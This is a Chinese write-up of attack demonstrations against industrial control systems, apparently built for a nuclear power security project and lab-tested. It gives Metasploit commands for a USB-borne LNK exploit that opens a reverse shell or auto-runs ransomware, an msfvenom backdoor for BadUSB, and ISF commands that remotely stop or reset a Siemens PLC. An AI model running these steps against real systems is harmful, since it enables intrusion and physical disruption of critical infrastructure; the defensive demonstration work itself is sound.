针对PLC、SCADA与上位机的攻防实践案例分享

在某核电的安全项目中，感谢公司leader信任让我负责项目的总体方案设计、攻防案例设计、安全防护等方案。

经过前期大量的搜索、复现、思考、选取，顺利完成该项目的建设实施。于是，在此文中分享一些可以在工控安全项目中进行攻防演示的案例，以供大家参考。

   针对工控系统上位机操作系统攻防案例

漏洞一：永恒之蓝

漏洞描述

漏洞影响

演示步骤

  针对工控系统上位机办公软件攻防案例

漏洞一：噩梦公式二代

漏洞描述

漏洞影响

1. Microsoft Office 2007 Service Pack 3
2. Microsoft Office 2010 Service Pack 2
3. Microsoft Office 2013 Service Pack 1
4. Microsoft Office 2016

演示步骤

  针对工控系统上位机USB外设攻防案例

攻击手法一：震网三代

2010年，攻击伊朗核工厂的漏洞利用工具就是“震网一代”，它因此被公认为世界上首个网络“超级破坏性武器”。

2011 年，“震网二代”蠕虫病毒出现，因为它会在临时目录下生成名为~DQ 的随机文件，也被称作Duqu。

2017年6月14日凌晨，微软发布安全公告称，Windows快捷方式存在高危漏洞（CVE-2017-8464），黑客可以通过U盘、网络共享等途径触发漏洞，完全控制用户系统。

此漏洞与震网病毒攻破伊朗核电站使用的漏洞非常相似，对能源、交通、金融等基础设施隔离网极具杀伤力，因此定义为“震网三代”漏洞。

漏洞简介

“震网三代”漏洞是Windows系统在处理LNK文件（快捷方式）过程中发生的远程代码执行漏洞。当存在漏洞的电脑被插入恶意U盘时，不需要任何操作，漏洞攻击程序就可以完全控制用户的电脑系统。该漏洞也可能由用户访问网络共享、网络下载、拷贝文件等操作被触发和植入木马。

“震网三代”漏洞的原理与震网病毒入侵破坏伊朗核设施所使用的漏洞（CVE-2010-2568）非常相似，都可以穿透隔离网络。由于物理隔离的基础设施和核心网络通常需要使用U盘、移动硬盘等存储设备进行数据交换，能够通过U盘触发的“震网三代”漏洞就成为渗透控制隔离网的大杀器，其威力完全不亚于前两代震网攻击。

“震网三代”漏洞影响从Vista到Win 10的所有主流版本，XP和2003则不受影响。目前微软已经发布了“震网三代”漏洞补丁，同期还修复了Windows搜索远程命令执行漏洞（CVE-2017-8543）等近百个漏洞。

漏洞影响

• Windows 7

• Windows 8.1

• Windows RT 8.1

• Windows 10

• Windows Server 2008

• Windows Server 2008 R2

• Windows Server 2012

• Windows Server 2012 R2

• Windows Server 2016

演示步骤

1.打开msfconsole，进入metasploit控制台界面
2.指定攻击模块：use exploits/windows/fileformat/cve_2017_8464_lnk_rce
3.查看模块配置信息：show options

可以指定dll、link文件名
4.设置payload：
反弹meterpreter会话

set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.110

可以跟勒索病毒（或者PLC定向攻击脚本）结合，场景是利用震网三代漏洞制作的U盘插入待攻击机器，自动运行勒索程序（或者PLC定向攻击脚本）

set payload windows/x64/exec
set cmd "C:\\Users\\lenovo\\Desktop\\attack.py"

5.最后执行exploit，将生成的文件拷贝进干净、稳定、可用的U盘中即制作成功

 攻击手法二：badUSB

 原理简述

演示步骤

1.攻击者事先制作好badUSB硬件设备，选择基于ATTINY85微控制器的USB开发板Digispark。
2.使用烧录代码的编译器Arduino IDE，将恶意代码烧录到BadUSB中。

3.配置好相关参数，将开发板设为Digispark，编程器设为USBtinyISP，编写好代码后，就可以点击“上传”按钮，然后插入BadUSB设备，一款简易BadUSB就做好了。

4.使用Metasploit生成攻击反向控制后门文件，执行如下命令

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=5555 -f exe >shell.exe

5.在MSF服务端，开启监听，等待目标机器中后门反弹回shell

6.攻击者可诱使目标机器的使用者将特制的badusb设备插入目标设备，当目标机器被插上U盘后，即会自动执行内部控制代码，在目标设备上模拟键鼠进行操作，下载执行了后门文件，此时攻击者就获得了目标机器反弹的shell，控制了目标机器。

  针对工控系统编程组态软件攻防案例

攻击手法一：震网

Stuxnet（震网）

震网病毒简述

 震网传播方式

Stuxnet 蠕虫的攻击目标是 SIMATIC WinCC 软件。后者主要用于工业控制系统的数据采集与监控，一般部署在专用的内部局域网中，并与外部互联网实行物理上的隔离。为了实现攻击，Stuxnet 蠕虫采取多种 手段进行渗透和传播，如图所示

  针对工控系统SCADA系统攻防案例

 漏洞一：WebAccess

CVE-2017-16720

漏洞简述

此漏洞允许攻击者使用RPC协议通过TCP端口4592执行远程命令。
通过利用恶意分布式计算环境/远程过程调用（DCERPC），webvrpcs.exe服务将命令行指令传递给主机， webvrpcs.exe服务以管理员访问权限运行。版本小于8.3、8.3.1、8.3.2仍然存在特定的安全漏洞。

漏洞复现

通过官方渠道，下载存在该漏洞的版本程序
http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe
安装环境：Windows Server 2008 R2 x64

安装一律默认NEXT即可，TCP端口也无需自定义，默认程序端口4592

安装完成，系统重启，可查看本机开放端口情况

可以看到漏洞所利用的端口4592已经正常开放

现在，我们使用附件中的EXP脚本，对搭载Advantech WebAccess 8.2-2017.08.18程序的服务器进行攻击

漏洞攻击成功的话，利用EXP脚本发送系统命令执行指令到服务器上，服务器会执行对应指令，弹出计算器。

可以看到服务器弹出了计算器，证明漏洞利用成功!

   流量分析

通过对EXP脚本执行过程中，使用Wireshark抓取对应数据流量，来看服务器通信过程

   针对工控系统PLC攻防案例

攻击手法一：S7-1200启停

针对西门子S7协议或罗克韦尔AB Ethernet/IP、施耐德Modbus等工控协议，攻击者通过对主流工控协议的深度分析，向PLC设备发送远程停机、程序上传下载等控制指令数据报文，实现对下位机PLC的非法控制。

  工具及运行环境

root@kali:~# git clone https://github.com/dark-lbp/isf/
root@kali:~# cd isf/
root@kali:~/isf# python isf.py
root@kali:~/isf# pip install -r requirements.txt

安装好所需python模块，运行isf.py无报错

   网络设置与PLC连接

本次实验所用的PLC设备如下，设备型号为SIMATIC S7-1200

将设备接通电源后，此时PLC 指示灯 RUN/STOP 点亮 绿灯

此时我们还不知道PLC设定的IP地址，所以需要对网段进行扫描

再使用网线将PLC与主机相连，配置主机网卡IP地址

可以看到：使用nmap扫描出的设备除了本机IP就是PLC设备的IP了，其对应的MAC地址也与设备上的标识一致

   远程攻击演示

这里我们用到的攻击模块是
exploits/plcs/siemens/s7_1200_plc_control

show options查看该模块的配置信息
target: 攻击PLC目标IP地址
port: 攻击PLC目标端口（默认是102端口）
command：攻击指令（0-启动PLC、1-停止PLC、2-重置PLC、3-重置PLC和IP）

设置好后，输入run指令 开始远程攻击PLC

此时PLC指示灯 RUN/STOP 变成 黄灯，说明PLC设备已经停止运行，远程攻击成功！

  针对工控系统OPC数据通信攻防案例

 攻击手法一

利用OPC协议漏洞，在通过OPC服务器与MES服务器进行数据通信过程中，攻击者可以伪装成合法的OPC Client对工控系统数据进行读写。